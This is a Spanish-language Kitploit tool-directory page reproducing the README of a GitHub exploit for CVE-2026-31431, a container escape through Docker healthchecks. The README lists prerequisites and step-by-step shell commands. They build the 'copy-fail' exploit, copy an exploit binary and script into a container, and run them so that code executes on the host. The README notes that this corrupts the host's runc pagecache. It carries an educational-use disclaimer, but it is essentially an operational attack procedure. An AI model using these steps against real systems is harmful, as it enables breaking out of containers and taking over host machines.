Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/hans362
/cve-2026-31431-copy-fail-container-escape
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónSeguridad en la NubeAprendizaje y EducaciónEscape de Contenedores
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

# Escape de contenedor en cualquier contenedor docker con healthcheck habilitado mediante CVE-2026-31431

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-31431-Copy-Fail-Container-Escape

Demo

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

Requisitos previos

  • Contenedor vulnerable a CVE-2026-31431
  • Healthcheck del contenedor configurado y comando del healthcheck conocido
  • Acceso root obtenido dentro del contenedor (si no, puedes simplemente usar Copy Fail para obtenerlo)

En este repositorio, se proporciona docker-compose.yml para configurar un contenedor vulnerable. También puedes usar cualquier otro contenedor vulnerable o configurar el tuyo propio, pero recuerda cambiar el código del exploit en consecuencia.

Pasos para explotar

root@kitploit:~
# En la máquina host
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# Dentro del contenedor copyfail
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# Espera unos minutos a que se ejecute el healthcheck
# y comprueba si /tmp/pwned se crea en el host

# En la máquina host
ls /tmp/pwned

Una vez que el exploit tiene éxito, la pagecache del binario runc en la máquina host se corrompe. Puedes restaurarla ejecutando echo 3 | sudo tee /proc/sys/vm/drop_caches en el host.

Créditos

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

Aviso legal

Este repositorio es solo con fines educativos. No debe utilizarse para ninguna actividad maliciosa. El autor no es responsable de ningún daño causado por el mal uso de este código. Úsalo siempre en un entorno controlado y legal.

Descargar herramienta